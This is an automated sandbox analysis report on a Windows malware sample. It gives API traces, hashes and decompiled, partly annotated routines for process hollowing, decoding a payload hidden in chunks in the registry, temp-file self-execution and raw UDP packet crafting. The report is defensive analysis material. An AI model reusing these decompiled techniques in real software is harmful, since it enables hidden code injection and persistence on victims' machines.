                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Code
                                                                                                                                  • String ID: PromptOnSecureDesktop
                                                                                                                                  • API String ID: 3609698214-2980165447
                                                                                                                                  • Opcode ID: 39c3a5a53f78f07926ecb9a894269625e93d17a87676cf1a9de91011702fa4cf
                                                                                                                                  • Instruction ID: deae59b9a6c18e17a8054c2740d34a6eafe128a66e3352cd220e92de8f8b68f4
                                                                                                                                  • Opcode Fuzzy Hash: 39c3a5a53f78f07926ecb9a894269625e93d17a87676cf1a9de91011702fa4cf
                                                                                                                                  • Instruction Fuzzy Hash: D7218B72208115FFEB10ABB1ED49EDF3EACDB08364B218436F543F1091EA799A50966C
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(00410380,00410670,00000000,\\.\pipe\uvfipga,00AD7043), ref: 00AD6F4E
• GetProcAddress.KERNEL32(00000000), ref: 00AD6F55
• GetSystemDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104), ref: 00AD6F7B
• GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00AD6F92
Strings
Memory Dump Source
• Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: Directory$AddressHandleModuleProcSystemWindows
• String ID: C:\Windows\SysWOW64\$PromptOnSecureDesktop$\\.\pipe\uvfipga
• API String ID: 1082366364-3838926563
• Opcode ID: 04a770052eb57bbfbb30415af63bc188d31a19c33639d4dbddcadc0e825ea320
• Instruction ID: bff54d1e5304d8336b9fee0506918f994986ae8e2ff8bc917dac8bf229071653
• Opcode Fuzzy Hash: 04a770052eb57bbfbb30415af63bc188d31a19c33639d4dbddcadc0e825ea320
• Instruction Fuzzy Hash: 002104217443407DF7225331AD89FFB3E5C8B66710F1880A6F506962C1EAD988D6826D
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 63%
	// Decompiler output as recorded by the sandbox. Behaviour: builds a file name
	// under %TEMP% from four random digits, writes the string in _a4 to that file
	// and returns 1 on success, 0 if the file could not be created.
	E00409064(void* __eflags, void* _a4, CHAR* _a8) {
		long _v8;
		char _v1032;
		signed int _t29;
		signed int _t62;
		void* _t64;

		GetTempPathA(0x400,  &_v1032);
		E00408274( &_v1032);
		_t29 = E0040ECA5();            // PRNG call, reduced modulo 9 below
		_t62 = 9;
		_push(_t29 % _t62);
		_push(E0040ECA5() % _t62);
		_push(E0040ECA5() % _t62);
		_push(E0040ECA5() % _t62);
		_push( &_v1032);
		wsprintfA(_a8, E00402544(0x4122f8, 0x410794, 0xf, 0xe4, 0xc8));   // format string is decoded at runtime
		E0040EE2A(_t62, 0x4122f8, 0, 0x100);                               // clears the decoded format buffer
		_t64 = CreateFileA(_a8, 0x40000000, 0, 0, 2, 0, 0);                // GENERIC_WRITE, CREATE_ALWAYS
		if(_t64 <= 0) {
			return 0;
		}
		WriteFile(_t64, _a4, lstrlenA(_a4),  &_v8, 0);
		CloseHandle(_t64);
		return 1;
	}

APIs
• GetTempPathA.KERNEL32(00000400,?,00000000,PromptOnSecureDesktop), ref: 0040907B
• wsprintfA.USER32 ref: 004090E9
• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040910E
• lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 00409122
• WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0040912D
• CloseHandle.KERNEL32(00000000), ref: 00409134
Strings
Memory Dump Source
• Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: File$CloseCreateHandlePathTempWritelstrlenwsprintf
• String ID: PromptOnSecureDesktop
• API String ID: 2439722600-2980165447
• Opcode ID: 428e34b473acadaeafd011e6997972491243de957368e91afa7baf983afb4ff9
• Instruction ID: 58bbe077760212e8da181cf829ffda1a70542de1f4ba4b23f7e3a80b8f6fba70
• Opcode Fuzzy Hash: 428e34b473acadaeafd011e6997972491243de957368e91afa7baf983afb4ff9
• Instruction Fuzzy Hash: 451175B26401147AF7246723DD0AFEF3A6DDBC8704F04C47AB70AB50D1EAB94A519668
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetTempPathA.KERNEL32(00000400,?), ref: 00AD92E2
• wsprintfA.USER32 ref: 00AD9350
• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00AD9375
• lstrlen.KERNEL32(?,?,00000000), ref: 00AD9389
• WriteFile.KERNEL32(00000000,?,00000000), ref: 00AD9394
• CloseHandle.KERNEL32(00000000), ref: 00AD939B
Strings
Memory Dump Source
• Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: File$CloseCreateHandlePathTempWritelstrlenwsprintf
• String ID: PromptOnSecureDesktop
• API String ID: 2439722600-2980165447
• Opcode ID: 15e5744a609ce20ae0f07ead06a63c4ecb295d114b6c11b49a51968f57c888d1
• Instruction ID: 1a8fae83a8f71e2742470a562e1eaf82921c641c1c5f2c09fe42e90303d3a14b
• Opcode Fuzzy Hash: 15e5744a609ce20ae0f07ead06a63c4ecb295d114b6c11b49a51968f57c888d1
• Instruction Fuzzy Hash: 711184B17401147BE7207731ED0EFEF3A6EDBC8B10F008066BB0AE5191EEB48E518664
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00AD9A18
• GetThreadContext.KERNEL32(?,?), ref: 00AD9A52
• TerminateProcess.KERNEL32(?,00000000), ref: 00AD9A60
• WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00AD9A98
• SetThreadContext.KERNEL32(?,00010002), ref: 00AD9AB5
• ResumeThread.KERNEL32(?), ref: 00AD9AC2
Strings
Memory Dump Source
• Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: ProcessThread$Context$CreateMemoryResumeTerminateWrite
• String ID: D
• API String ID: 2981417381-2746444292
• Opcode ID: e2726c898831fa2e77ccd26efcb7f3ad26579022b5c1c2510a23e725eb230ef9
• Instruction ID: f6e401de016b6237e869c9bf79d7ea15add8372e385cc0e98e449091a090443d
• Opcode Fuzzy Hash: e2726c898831fa2e77ccd26efcb7f3ad26579022b5c1c2510a23e725eb230ef9
• Instruction Fuzzy Hash: 3E213DB2901119BBDB119BA1DC09EEF7BBCEF04790F404062BA1AE6160E775CA45CBA4
Uniqueness

Uniqueness Score: -1.00%

APIs
• inet_addr.WS2_32(004102D8), ref: 00AD1C18
• LoadLibraryA.KERNEL32(004102C8), ref: 00AD1C26
• GetProcessHeap.KERNEL32 ref: 00AD1C84
• RtlAllocateHeap.NTDLL(00000000,00000000,00000288), ref: 00AD1C9D
• RtlReAllocateHeap.NTDLL(?,00000000,00000000,?), ref: 00AD1CC1
• HeapFree.KERNEL32(?,00000000,00000000), ref: 00AD1D02
• FreeLibrary.KERNEL32(?), ref: 00AD1D0B
Memory Dump Source
• Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: Heap$AllocateFreeLibrary$LoadProcessinet_addr
• String ID:
• API String ID: 2324436984-0
• Opcode ID: 86649b882a12f673409f1c62972542be89ea1fb211e92df17ca9b312c060c3f6
• Instruction ID: 90b34e68aed0a9e7bea192b26e1a8b06799eaf750d7a687c5df65f9cdd5954cf
• Opcode Fuzzy Hash: 86649b882a12f673409f1c62972542be89ea1fb211e92df17ca9b312c060c3f6
• Instruction Fuzzy Hash: AD312972E00219BFCB519FE4DC888FEBBBAEB45751B24447AF502A6210D7B54E80DB94
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.279779724.0000000000415000.00000020.00000001.01000000.00000003.sdmp, Offset: 00415000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_415000_OcmKX57vR7.jbxd
Similarity
• API ID: _write_multi_char$__get_printf_count_output__mbtowc_l_get_int_arg_write_string
• String ID:
• API String ID: 4168457693-0
• Opcode ID: f7012a2b4727eafad902f081be100c809fce816dd7738765f83eb90d9cd604d5
• Instruction ID: 6c63f3ddf49572ac79c6d8e251c1f7650864198d5e2a559435b00663c8f182db
• Opcode Fuzzy Hash: f7012a2b4727eafad902f081be100c809fce816dd7738765f83eb90d9cd604d5
• Instruction Fuzzy Hash: 25A181B1E002289BDB24DB46DC81BAEB374AB44308F54449AE6097B282D7786E84CF5D
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00ADC6B4
                                                                                                                                  • InterlockedIncrement.KERNEL32(00ADC74B), ref: 00ADC715
                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,0040B535,00000000,?,00ADC747), ref: 00ADC728
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00ADC747,00413588,00AD8A77), ref: 00ADC733
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCountCreateHandleIncrementInterlockedThreadTick
                                                                                                                                  • String ID: 0 v$localcfg
                                                                                                                                  • API String ID: 1026198776-2166502722
                                                                                                                                  • Opcode ID: 7930164416072ce379d69f2024e67a12fb5078e265013c4e4f79f9c65834da75
                                                                                                                                  • Instruction ID: fb385a9c038dda9f2617ed6e52d1e9c1199b94a7eb42c0885444cd293257e9e1
                                                                                                                                  • Opcode Fuzzy Hash: 7930164416072ce379d69f2024e67a12fb5078e265013c4e4f79f9c65834da75
                                                                                                                                  • Instruction Fuzzy Hash: 18513CB1A01B428FD7649F69D68552ABBE9FB48310B90693FE18BC7B90D774F844CB10
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

C-Code - Quality: 100%
			/* Annotated decompilation. The routine opens a registry key, walks the values
			   <prefix>0, <prefix>1, ... (E0040F1ED is evidently an itoa-style helper: it is
			   handed radix 0xa and writes just past the copied prefix), sums their sizes,
			   allocates one buffer for the total (E0040DB2E; pointer kept in the global at
			   0x4136c4), reads the chunks back to back, and only then hands the buffer to
			   E00402544 (with the constants 0xe4 / 0xc8) and E0040E332. Per the API trace
			   below, _a4 is 0x80000001 (HKEY_CURRENT_USER) and the prefix string is
			   "PromptOnSecureDesktop". Comments are added; the statements are unchanged. */
			E0040E3CA(void* __edx, void* _a4, char* _a8, intOrPtr* _a12) {
				int* _v8;          // running value index
				int _v12;          // chunk size (pass 1) / write cursor into the buffer (pass 2)
				void* _v16;        // opened HKEY
				intOrPtr _v20;     // end of the copied prefix inside _v68, where the digits go
				int _v24;          // value type from RegQueryValueExA, never inspected
				int _v28;          // bytes read for the current chunk (pass 2)
				int _v32;          // total size of all chunks
				int* _v36;         // return value: 1 on success, 0 otherwise
				char _v68;         // value-name buffer: prefix (at most 0x1c bytes) + decimal index
				intOrPtr* _t52;
				int _t69;
				int _t78;
				intOrPtr _t80;
				void* _t82;
				void* _t84;
				void* _t85;
				int _t89;
				void* _t91;
				void* _t92;
				void* _t93;
				char* _t56;        // temporaries used but not declared in the raw decompiler output
				int _t106;

				_t82 = __edx;
				_v36 = 0;
				// 0x20119 == KEY_READ | KEY_WOW64_64KEY: the 64-bit registry view is read even from a 32-bit process
				if(RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v16) != 0) {
					L16:
					return _v36;
				}
				_t52 = _a12;
				_t89 = 0;
				_t6 = _t52 + 1; // 0x4128f9
				_t84 = _t6;
				do {                                      // inlined strlen() of the prefix
					_t80 =  *_t52;
					_t52 = _t52 + 1;
				} while (_t80 != 0);
				_t85 = _t52 - _t84;
				_v8 = 0;
				if(_t85 > 0x1c) {                         // cap the prefix so the index digits still fit
					_t85 = 0x1c;
				}
				E0040EE08( &_v68, _a12, _t85);            // memcpy-style copy of the prefix into _v68
				_t56 = _t91 + _t85 - 0x40;                // end of the copied prefix
				_v12 = 0;
				_v20 = _t91 + _t85 - 0x40;
				E0040F1ED(0, _t56, 0xa);                  // append "0": first name is <prefix>0
				_t93 = _t92 + 0x18;
				// pass 1: query with a NULL data pointer to collect sizes only
				if(RegQueryValueExA(_v16,  &_v68, 0,  &_v24, 0,  &_v12) != 0) {
					L15:
					RegCloseKey(_v16);
					goto L16;
				} else {
					do {
						_t89 = _t89 + _v12;               // running total of chunk sizes
						_v8 = _v8 + 1;
						_v12 = 0;
						E0040F1ED(_v8, _v20, 0xa);        // next name: <prefix><index>
						_t93 = _t93 + 0xc;
					} while (RegQueryValueExA(_v16,  &_v68, 0,  &_v24, 0,  &_v12) == 0);
					if(_t89 <= 0) {
						goto L15;
					}
					_v32 = _t89;
					E0040DB2E(_t89);                      // allocate _t89 bytes; pointer stored at 0x4136c4
					_t69 =  *0x4136c4;
					if(_t69 == 0) {
						goto L15;
					}
					_v12 = _t69;                          // write cursor starts at the buffer
					_v8 = 0;
					// pass 2: read the chunks back to back into the buffer
					while(1) {
						_v28 = _t89;                      // remaining capacity
						E0040F1ED(_v8, _v20, 0xa);
						_t93 = _t93 + 0xc;
						if(RegQueryValueExA(_v16,  &_v68, 0,  &_v24, _v12,  &_v28) != 0) {
							break;
						}
						_t78 = _v28;
						if(_t78 == 0) {                   // a zero-length chunk ends the walk early
							break;
						}
						_v12 =  &(_v12[_t78]);
						_t89 = _t89 - _t78;
						_v8 = _v8 + 1;
						if(_t89 > 0) {
							continue;
						}
						break;
					}
					_t106 = _t89;
					if(_t89 == 0) {                       // success only if the whole counted total was read
						// buffer transformed in place with the constants 0xe4 / 0xc8, then consumed
						E00402544( *0x4136c4,  *0x4136c4, _v32, 0xe4, 0xc8);
						E0040E332(_t82, _t106,  *0x4136c4, _v32);
						_v36 = 1;
					}
					goto L15;
				}
			}
			Instruction addresses of the decompiled lines above: 0x0040e3ca through 0x0040e52d (the per-line address column did not survive extraction).

                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,0040E5F2,00000000,00020119,0040E5F2,PromptOnSecureDesktop), ref: 0040E3E6
                                                                                                                                  • RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,00000000,80000001,?,?,?,?,000000C8,000000E4), ref: 0040E44E
                                                                                                                                  • RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,00000000,80000001,?,?,?,?,?,?,?,000000C8,000000E4), ref: 0040E482
                                                                                                                                  • RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,80000001,?), ref: 0040E4CF
                                                                                                                                  • RegCloseKey.ADVAPI32(0040E5F2,?,?,?,?,000000C8,000000E4), ref: 0040E520
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: QueryValue$CloseOpen
                                                                                                                                  • String ID: PromptOnSecureDesktop
                                                                                                                                  • API String ID: 1586453840-2980165447
                                                                                                                                  • Opcode ID: 919e03d4f2ff633a109d2dab258d7b21093642562d8d8bd3785840ecf5c8d3be
                                                                                                                                  • Instruction ID: f21eb42f94b351107ce6bcf9928d909f9cde6c0f887f3b022360bbb50f243882
                                                                                                                                  • Opcode Fuzzy Hash: 919e03d4f2ff633a109d2dab258d7b21093642562d8d8bd3785840ecf5c8d3be
                                                                                                                                  • Instruction Fuzzy Hash: D94106B2D00219BFDF119FD5DC81DEEBBB9EB08308F14487AE910B2291E3359A559B64
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00404280(void* __ecx, intOrPtr _a4) {
	void* _v8;
	unsigned int _v12;
	unsigned int _v16;
	void* _v20;
	intOrPtr _v24;
	char _v28;
	signed int _t35;
	signed int _t38;
	signed int _t40;
	void* _t67;
	void* _t68;
	void* _t73;
	intOrPtr* _t74;

	_t68 = __ecx;
	_t35 = CreateEventA(0, 1, 1, 0);
	_v8 = _t35;
	if(_t35 != 0) {
		_t38 = E00404000(E00403ECD(_t68),  &_v20);
		if(_t38 == 0) {
			L11:
			_t40 = CloseHandle(_v8) | 0xffffffff;
			L12:
			return _t40;
		}
		_t67 = _v20;
		_t40 = _t38 | 0xffffffff;
		if(_t67 == _t40) {
			goto L12;
		}
		_v16 = E0040ECA5();
		E00403F18(_t67,  &_v16, 4, _v8, 0x7d0);
		if(E00403F8C(_t67,  &_v12, 4, _v8, 0x7d0) == 0 || _v12 != (_v16 >> 2) + _v16) {
			CloseHandle(_t67);
			goto L11;
		} else {
			_v12 = _v12 + (_v12 >> 2);
			E00403F18(_t67,  &_v12, 4, _v8, 0x7d0);
			_v28 = 1;
			_t73 = 0xc;
			_v24 = 1;
			E00403F18(_t67,  &_v28, 8, _v8, 0x7d0);
			_t74 = E0040EBCC(_t73);
			 *_t74 = 0x5e;
			 *((intOrPtr*)(_t74 + 4)) = 2;
			if(_a4 != 0) {
				 *(_t74 + 8) =  *(_t74 + 8) & 0x00000000;
				 *0x41215a =  *0x41215a + 1;
			} else {
				 *(_t74 + 8) = 1;
			}
			E00403F18(_t67, _t74, _v24, _v8, 0x7d0);
			E0040EC2E(_t74);
			E00403F8C(_t67,  &_v12, 4, _v8, 0x7d0);
			CloseHandle(_v8);
			CloseHandle(_t67);
			_t40 = 0 | _a4 == 0x00000000;
			goto L12;
		}
	}
	return _t35 | 0xffffffff;
}

APIs
• CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,004098FD,00000001,00000100,PromptOnSecureDesktop,0040A3C7), ref: 00404290
• CloseHandle.KERNEL32(0040A3C7), ref: 004043AB
• CloseHandle.KERNEL32(00000001), ref: 004043AE
Strings
Memory Dump Source
• Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: CloseHandle$CreateEvent
• String ID: PromptOnSecureDesktop
• API String ID: 1371578007-2980165447
• Opcode ID: 0dd57ba844ed6ccee3cc7ff792ca289a65d044fd43fa66271c948426b094db86
• Instruction ID: 580dd723e2696739ab8c529274da47b2bc3b4765397f1bbb4cd5042057411b76
• Opcode Fuzzy Hash: 0dd57ba844ed6ccee3cc7ff792ca289a65d044fd43fa66271c948426b094db86
• Instruction Fuzzy Hash: F94181B1900209BADB109BA2CD45F9FBFBCEF40355F104566F614B21C1D7789A51DBA4
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00AD6CE4
• GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 00AD6D22
• GetLastError.KERNEL32 ref: 00AD6DA7
• CloseHandle.KERNEL32(?), ref: 00AD6DB5
• GetLastError.KERNEL32 ref: 00AD6DD6
• DeleteFileA.KERNEL32(?), ref: 00AD6DE7
• GetLastError.KERNEL32 ref: 00AD6DFD
Memory Dump Source
• Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: ErrorLast$File$CloseCreateDeleteDiskFreeHandleSpace
• String ID:
• API String ID: 3873183294-0
• Opcode ID: f937a9db21ce505f63fbc05cea0012a17e3f79a74f005ea453ea48b098bba52a
• Instruction ID: e43d51c14e3988db676c6fe6147ac91ea2328b6eebc2dd248e5e12224c434605
• Opcode Fuzzy Hash: f937a9db21ce505f63fbc05cea0012a17e3f79a74f005ea453ea48b098bba52a
• Instruction Fuzzy Hash: 59310376A00649BFCB01EFE4ED48ADE7F7AEB48300F148066E292E3351D7708A45CB60
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.279779724.0000000000415000.00000020.00000001.01000000.00000003.sdmp, Offset: 00415000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_415000_OcmKX57vR7.jbxd
Similarity
• API ID: __aulldiv__aullrem_get_int64_arg
• String ID: '$0$9
• API String ID: 3120068967-269856862
• Opcode ID: 7bbc5f25a49e61d68743073381ab8708b2bd49eee730fca9a6a09fabe99c0665
• Instruction ID: a00eee181b3eeb95df4b7ce26ca00e0e60aed49754cb2fdd6ab912959dcfa0b4
• Opcode Fuzzy Hash: 7bbc5f25a49e61d68743073381ab8708b2bd49eee730fca9a6a09fabe99c0665
• Instruction Fuzzy Hash: C441E4B1E05229DFEB24CF58D889BAEB7B5BB84304F6481DAD049A7240C7789E81CF45
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 26%
E004026FF(intOrPtr* __eax, intOrPtr _a4, intOrPtr _a8, long _a12) {
	long* _t33;
	long _t35;
	long* _t36;
	long _t37;
	long _t38;
	short _t39;
	short _t40;
	char _t42;
	intOrPtr _t43;
	void* _t48;
	long* _t49;
	long* _t51;
	long* _t52;
	long* _t53;
	long* _t54;
	void* _t55;
	long* _t56;
	long* _t57;
	long* _t60;
	intOrPtr* _t63;
	intOrPtr* _t65;
	void* _t66;

	_t65 = __eax;
	_t33 =  *0x412bf8; // 0x0
	_t42 = 0;
	if(_t33 == 0) {
		_t33 = E0040EBCC(0x400);
		_pop(_t48);
		 *0x412bf8 = _t33;
	}
	E0040EE2A(_t48, _t33, _t42, 0x400);
	_t35 = GetTickCount();
	_t49 =  *0x412bf8; // 0x0
                                                                                                                                  				_t63 = __imp__#9;
                                                                                                                                  				 *_t49 = _t35;
                                                                                                                                  				_t36 =  *0x412bf8; // 0x0
                                                                                                                                  				_t36[0] = _a12;
                                                                                                                                  				_t37 =  *_t63(1);
                                                                                                                                  				_t51 =  *0x412bf8; // 0x0
                                                                                                                                  				_t51[1] = _t37;
                                                                                                                                  				_t52 =  *0x412bf8; // 0x0
                                                                                                                                  				_t38 = 0;
                                                                                                                                  				_t52[1] = 0;
                                                                                                                                  				_t53 =  *0x412bf8; // 0x0
                                                                                                                                  				_t53[2] = 0;
                                                                                                                                  				_t54 =  *0x412bf8; // 0x0
                                                                                                                                  				_t54[2] = 0;
                                                                                                                                  				_t60 =  *0x412bf8; // 0x0
                                                                                                                                  				_t55 = 0;
                                                                                                                                  				if( *_t65 != _t42) {
                                                                                                                                  					do {
                                                                                                                                  						_t43 =  *((intOrPtr*)(_t38 + _t65));
                                                                                                                                  						_a12 = _t38;
                                                                                                                                  						while(_t43 != 0) {
                                                                                                                                  							if(_t43 != 0x2e) {
                                                                                                                                  								_a12 = _a12 + 1;
                                                                                                                                  								_t43 =  *((intOrPtr*)(_a12 + _t65));
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  							break;
                                                                                                                                  						}
                                                                                                                                  						 *((char*)(_t55 +  &(_t60[3]))) = _a12 - _t38;
                                                                                                                                  						_t55 = _t55 + 1;
                                                                                                                                  						while(_t38 < _a12) {
                                                                                                                                  							 *((char*)(_t55 +  &(_t60[3]))) =  *((intOrPtr*)(_t38 + _t65));
                                                                                                                                  							_t55 = _t55 + 1;
                                                                                                                                  							_t38 = _t38 + 1;
                                                                                                                                  						}
                                                                                                                                  						if( *((char*)(_t38 + _t65)) == 0x2e) {
                                                                                                                                  							_t38 = _t38 + 1;
                                                                                                                                  						}
                                                                                                                                  						_t42 = 0;
                                                                                                                                  					} while ( *((intOrPtr*)(_t38 + _t65)) != 0);
                                                                                                                                  				}
                                                                                                                                  				 *((char*)(_t55 +  &(_t60[3]))) = _t42;
                                                                                                                                  				_t24 = _t55 + 0xd; // 0xf
                                                                                                                                  				_t66 = _t24;
                                                                                                                                  				_t39 =  *_t63(0xf);
                                                                                                                                  				_t56 =  *0x412bf8; // 0x0
                                                                                                                                  				 *((short*)(_t56 + _t66)) = _t39;
                                                                                                                                  				_t40 =  *_t63(1);
                                                                                                                                  				_t57 =  *0x412bf8; // 0x0
                                                                                                                                  				 *((short*)(_t57 + _t66 + 2)) = _t40;
                                                                                                                                  				__imp__#20(_a4, 0x412bf8, _t66 + 4, _t42, _a8, 0x10);
                                                                                                                                  				return 0 | _t40 <= 0x00000000;
                                                                                                                                  			}

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040272E
                                                                                                                                  • htons.WS2_32(00000001), ref: 00402752
                                                                                                                                  • htons.WS2_32(0000000F), ref: 004027D5
                                                                                                                                  • htons.WS2_32(00000001), ref: 004027E3
                                                                                                                                  • sendto.WS2_32(?,00412BF8,00000009,00000000,00000010,00000010), ref: 00402802
                                                                                                                                    • Part of subcall function 0040EBCC: GetProcessHeap.KERNEL32(00000000,00000000,80000001,0040EBFE,7FFF0001,?,0040DB55,7FFF0001), ref: 0040EBD3
                                                                                                                                    • Part of subcall function 0040EBCC: RtlAllocateHeap.NTDLL(00000000,?,0040DB55,7FFF0001), ref: 0040EBDA
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: htons$Heap$AllocateCountProcessTicksendto
                                                                                                                                  • String ID: 0 v
                                                                                                                                  • API String ID: 1128258776-3142137124
                                                                                                                                  • Opcode ID: 6324b7b9e2dccaab36c5df195a5e4e953a761730b1da31182c129fee2206b1b7
                                                                                                                                  • Instruction ID: e317574a351225f02cdc10e669db3389ba019fd1a924c3d0ab3f78f3d9a30560
                                                                                                                                  • Opcode Fuzzy Hash: 6324b7b9e2dccaab36c5df195a5e4e953a761730b1da31182c129fee2206b1b7
                                                                                                                                  • Instruction Fuzzy Hash: B8313A342483969FD7108F74DD80AA27760FF19318B19C07EE855DB3A2D6B6E892D718
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 79%
                                                                                                                                  			E00409145(void* __eflags) {
                                                                                                                                  				char _v264;
                                                                                                                                  				char _v1288;
                                                                                                                                  				char* _t13;
                                                                                                                                  				void* _t20;
                                                                                                                                  				void* _t23;
                                                                                                                                  				void* _t29;
                                                                                                                                  
                                                                                                                                  				_t29 = __eflags;
                                                                                                                                  				GetModuleFileNameA(GetModuleHandleA(0),  &_v264, 0x104);
                                                                                                                                  				CharToOemA( &_v264,  &_v264);
                                                                                                                                  				_t13 =  &_v264;
                                                                                                                                  				_push(_t13);
                                                                                                                                  				_push(_t13);
                                                                                                                                  				wsprintfA( &_v1288, E00402544(0x4122f8,  &E004107A8, 0x66, 0xe4, 0xc8));
                                                                                                                                  				E0040EE2A(_t23, 0x4122f8, 0, 0x100);
                                                                                                                                  				_t20 = E00409064(_t29,  &_v1288,  &_v264);
                                                                                                                                  				if(_t20 != 0) {
                                                                                                                                  					return ShellExecuteA(0, 0,  &_v264, 0, 0, 0);
                                                                                                                                  				}
                                                                                                                                  				return _t20;
                                                                                                                                  			}

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,?,00000104,00000100,PromptOnSecureDesktop), ref: 0040915F
                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000), ref: 00409166
                                                                                                                                  • CharToOemA.USER32 ref: 00409174
                                                                                                                                  • wsprintfA.USER32 ref: 004091A9
                                                                                                                                    • Part of subcall function 00409064: GetTempPathA.KERNEL32(00000400,?,00000000,PromptOnSecureDesktop), ref: 0040907B
